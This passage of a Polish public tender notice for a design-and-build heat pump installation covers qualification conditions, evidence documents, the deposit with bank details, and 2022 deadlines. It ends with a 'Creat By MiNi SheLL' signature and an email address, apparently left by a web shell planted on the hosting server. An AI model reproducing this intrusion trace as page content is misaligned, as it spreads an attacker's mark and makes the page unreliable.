dla co najmniej dwóch inwestycji, których przedmiotem była instalacja energetyczna zrealizowana w obiektach budowlanych z zakresu klas 2302 (Elektrownie) lub 2303 (Zakłady chemiczne) lub 2304 (Zakłady przemysłu ciężkiego, gdzie indziej nie sklasyfikowane ) Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) z czynnikiem: wodnym lub parowym o ciśnieniu roboczym min. 25 bar (g) które podlegały odbiorowi przez UDT lub odpowiednik w krajach UE, EOG lub EFTA.<br/>11.1.4.4.2.	kierownik projektu - osoba posiadająca doświadczenie i kwalifikacje: w ciągu ostatnich 10 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonywał funkcje Kierownika Projektu, Przedstawiciela Wykonawcy lub Dyrektora Budowy, lub Menadżera Kontraktu, lub funkcję równoważną do powyższych, i zarządzał od rozpoczęcia do zakończenia budowy co najmniej dwoma kontraktami w formule zaprojektuj-wybuduj, których przedmiotem była budowa instalacji technologicznych w obiektach budowlanych z zakresu klas 2302 lub 2303 lub 2304 Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) o wartości co najmniej 3.000.000,00 PLN każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 PZP o niepodleganiu wykluczeniu <br/>Wzór oświadczenia do ewentualnego wykorzystania stanowi załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">12.4.1.1.	W zakresie warunku dotyczącego sytuacji ekonomicznej i finansowej:<br/>12.4.1.1.1.	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiąc przed upływem terminu składania ofert – potwierdzająca spełnianie warunku, o którym mowa w pkt 11.1.3 SWZ;<br/>UWAGA: Dane finansowe w odniesieniu do Wykonawców spoza terytorium Rzeczpospolitej Polskiej podane w walucie innej niż PLN w celu wykazania spełnienia warunków udziału w postępowaniu, będą przeliczane przez Zamawiającego na PLN według średniego kursu wymiany waluty ogłaszanego przez Prezesa Narodowego Banku Polskiego z dnia ukazania się ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych;<br/>12.4.1.2.	W zakresie warunku dotyczącego zdolności technicznej lub zawodowej:<br/>12.4.1.2.1.	wykaz robót wykonanych nie wcześniej niż w okresie ostatnich 10 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w zakresie potwierdzającym spełnianie warunku, o którym mowa w pkt. 11.1.4.1 oraz 11.1.4.2. SWZ;<br/>12.4.1.2.2.	wykazy lokalizacji:<br/>12.4.1.2.2.1.	autoryzowanego serwisu Wykonawcy lub producentów kluczowych urządzeń tj. pompy ciepła, pomp w obiegu ciepłowniczym i stacji redukcyjnej oraz oświadczenie w zakresie potwierdzającym spełnienie warunku, o którym mowa w pkt. 11.1.4.3 SWZ;<br/>12.4.1.2.2.2.	magazynu części zamiennych Wykonawcy lub producenta kluczowych urządzeń tj. pompy ciepła, pomp w obiegu ciepłowniczym i stacji redukcyjnej, będących przedmiotem potencjalnej dostawy w okresie gwarancji i rękojmi oraz oświadczenie w zakresie potwierdzającym spełnienie warunku , o którym mowa w pkt. 11.1.4.3 SWZ;<br/>UWAGA: Zamawiający dokona weryfikacji spełniania warunku określonego w pkt. 11.1.4.3. na podstawie dokumentów określonych w pkt 12.4.1.2.2.1. i 12.4.1.2.2.2 oraz aplikacji GoogleMaps bez uwzględnienia aktualnego natężenia ruchu.<br/>12.4.1.2.3.	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – w zakresie potwierdzającym spełnianie warunków, o których mowa w pkt 11.1.4.3. SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W postępowaniu o udzielenie zamówienia Zamawiający żąda przedmiotowych środków dowodowych na potwierdzenie, że oferowane roboty budowlane spełniają określone przez Zamawiającego wymagania, cechy lub kryteria w następującym zakresie:<br/>13.1.1.	Ogólny opis zastosowanej technologii i zasady działania instalacji, wraz z przyjętymi rozwiązaniami technicznymi, technologicznymi, konstrukcyjnymi, materiałowymi, schematami instalacji z parametrami projektowymi na potwierdzenie zgodności z wymaganiami z PFU;<br/>13.1.2.	Opis planowanych do zastosowania urządzeń, materiałów i rozwiązań dla głównych urządzeń technologicznych ( dla: absorpcyjnej pompy ciepła, pomp obiegowych w systemie ciepłowniczym, stacji redukcyjnej) z podaniem nr oznaczenia na rysunkach, podstawowych maksymalnych wymiarów: długość, szerokość, wysokość, średnica, itp., producenta, typ urządzenia, na potwierdzenie zgodności z wymaganiami z PFU;<br/>13.1.3.	Schemat ideowy instalacji dla parametrów projektowych wraz z całościowym bilansem instalacji uwzględniającym zużycie mediów (woda, para, sprężone powietrze, energia elektryczna), wykorzystanie dodatkowych substancji chemicznych, produkcję ścieków na potwierdzenie zgodności z wymaganiami z PFU.<br/>13.1.4.	oświadczenia producentów lub dostawców urządzeń: absorpcyjnej pompy ciepła, pomp obiegowych systemu ciepłowniczego, stacji redukcyjnej o gotowości do realizacji dostaw, potwierdzające zgodność z wymaganiami SWZ. <br/>13.1.5.	Wypełniony i podpisany załącznik nr 7 do SWZ- Gabaryty pompy ciepła potwierdzające zgodność z wymogami PFU. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W postępowaniu o udzielenie zamówienia Zamawiający żąda przedmiotowych środków dowodowych na potwierdzenie, że oferowane roboty budowlane spełniają określone przez Zamawiającego wymagania, cechy lub kryteria w następującym zakresie:<br/>13.1.1.	Ogólny opis zastosowanej technologii i zasady działania instalacji, wraz z przyjętymi rozwiązaniami technicznymi, technologicznymi, konstrukcyjnymi, materiałowymi, schematami instalacji z parametrami projektowymi na potwierdzenie zgodności z wymaganiami z PFU;<br/>13.1.2.	Opis planowanych do zastosowania urządzeń, materiałów i rozwiązań dla głównych urządzeń technologicznych ( dla: absorpcyjnej pompy ciepła, pomp obiegowych w systemie ciepłowniczym, stacji redukcyjnej) z podaniem nr oznaczenia na rysunkach, podstawowych maksymalnych wymiarów: długość, szerokość, wysokość, średnica, itp., producenta, typ urządzenia, na potwierdzenie zgodności z wymaganiami z PFU;<br/>13.1.3.	Schemat ideowy instalacji dla parametrów projektowych wraz z całościowym bilansem instalacji uwzględniającym zużycie mediów (woda, para, sprężone powietrze, energia elektryczna), wykorzystanie dodatkowych substancji chemicznych, produkcję ścieków na potwierdzenie zgodności z wymaganiami z PFU.<br/>13.1.4.	oświadczenia producentów lub dostawców urządzeń: absorpcyjnej pompy ciepła, pomp obiegowych systemu ciepłowniczego, stacji redukcyjnej o gotowości do realizacji dostaw, potwierdzające zgodność z wymaganiami SWZ. <br/>13.1.5.	Wypełniony i podpisany załącznik nr 7 do SWZ- Gabaryty pompy ciepła potwierdzające zgodność z wymogami PFU. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 12.1.	Do oferty każdy Wykonawca zobowiązany jest dołączyć:<br/>12.1.1.	Dokumenty z których wynika umocowanie do składania oświadczeń woli w imieniu Wykonawcy (przynajmniej do złożenia oferty) – np. odpis z KRS lub CEIDG (o ile dotyczy). Jeżeli Wykonawca działa przez pełnomocnika należy dodatkowo załączyć stosowne pełnomocnictwo dla danej osoby. <br/>12.1.2.	Wypełniony formularz ofertowy - stanowiący załącznik nr 2 do SWZ oraz uzupełniony przez Wykonawcę załącznik nr 5 do SWZ– Wykaz cen oraz uzupełniony przez Wykonawcę załącznik nr 6 do SWZ– Tabele do uzupełnienia- dokumenty te nie podlegają uzupełnieniu; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 16.1.	Oferta zawierająca całość przedmiotu zamówienia powinna być zabezpieczona wadium w wysokości: 65 000,00 zł (sześćdziesiąt pięć tysięcy złotych 00/100)<br/>16.2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>16.3.	Wadium wnosi się w następujących formach:<br/>16.3.1.	pieniądzu,<br/>16.3.2.	gwarancjach bankowych,<br/>16.3.3.	gwarancjach ubezpieczeniowych,<br/>16.3.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku – o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020 r. poz. 299).<br/>16.4.	Uwaga: Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia bankowego powinno zawierać następujące elementy:<br/>16.4.1.	określenie terminu obowiązywania poręczenia lub gwarancji przez cały okres związania ofertą;<br/>16.4.2.	określenie kwoty poręczenia lub gwarancji;<br/>16.4.3.	wskazanie gwaranta poręczenia lub gwarancji;<br/>16.4.4.	wskazanie beneficjenta poręczenia lub gwarancji;<br/>16.4.5.	zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej <br/>kwoty zabezpieczenia na rzecz beneficjenta,<br/>16.4.6.	nieodwołalność poręczenia lub gwarancji,<br/>16.5.	W przypadku wniesienia wadium w formie pieniężnej należy je wpłacić przelewem na konto Zamawiającego:<br/>Nazwa banku: Santander Bank Polska S.A.<br/>Numer konta 73 1090 2053 0000 0001 4761 7962<br/>(IBAN: PL73109020530000000147617962, SWIFT: WBKPPLPP)<br/>powołując się na nazwę postępowania, nr sprawy oraz podając nazwę banku i numer swojego konta, na które należy zwrócić wadium.<br/>16.6.	Za skuteczne wniesione wadium w pieniądzu, Zamawiający uważa wadium, które w oznaczonym terminie (przed upływem terminu składania ofert lub wniosków) znajdzie się na rachunku bankowym Zamawiającego (decyduje data uznania rachunku Zamawiającego).<br/>16.7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>16.8.	Zamawiający dopuszcza złożenie wadium w kilku formach przy jednoczesnym spełnieniu powyższych obowiązków. <br/>16.9.	Zasady zwrotu i zatrzymania wadium określa PZP.<br/>16.10.	Złożenie przez Wykonawcę wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 PZP powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:<br/>11.2.1.	Szczególny sposób spełniania przez takich Wykonawców warunków udziału w postępowaniu: Zamawiający nie dopuszcza dzielenia warunku określonego w pkt. 11.1.4.1, pkt. 11.1.4.2, co oznacza że dany warunek musi w całości spełnić jeden z Wykonawców Wykonawcy tacy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>11.2.2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt. 11.1.2 SWZ. jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>11.2.3.	Do Wykonawców takich stosuje się odpowiednio przepisy dotyczące Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 9.3.	Zamawiający przewiduje udzielenie zaliczek, o których mowa w art. 442 PZP: Zamawiający wypłaci na wniosek Wykonawcy zaliczkę w wysokości 1 500 000,00 PLN na poczet realizacji zamówienia z przeznaczeniem na dostawę pompy ciepła po uzyskaniu zatwierdzenia Projektu Podstawowego. W przypadku skorzystania przez Wykonawcę z Podwykonawcy, umowa na dostawę pompy miedzy nimi musi zawierać cesję na rzecz Zamawiającego; umowa wymaga akceptacji Zamawiającego, zgodnie z § 6 ust. 11 projektowanych postanowień umowy. Zaliczka zostanie wypłacona na podstawie prawidłowo wystawionej faktury pro-forma, doręczonej przez Wykonawcę. Zaliczka zostanie rozliczona przy rozliczeniu poz. 3.1 Wykazu cen (załącznik nr 5 do SWZ). <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy stanowią załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/khk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-19 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com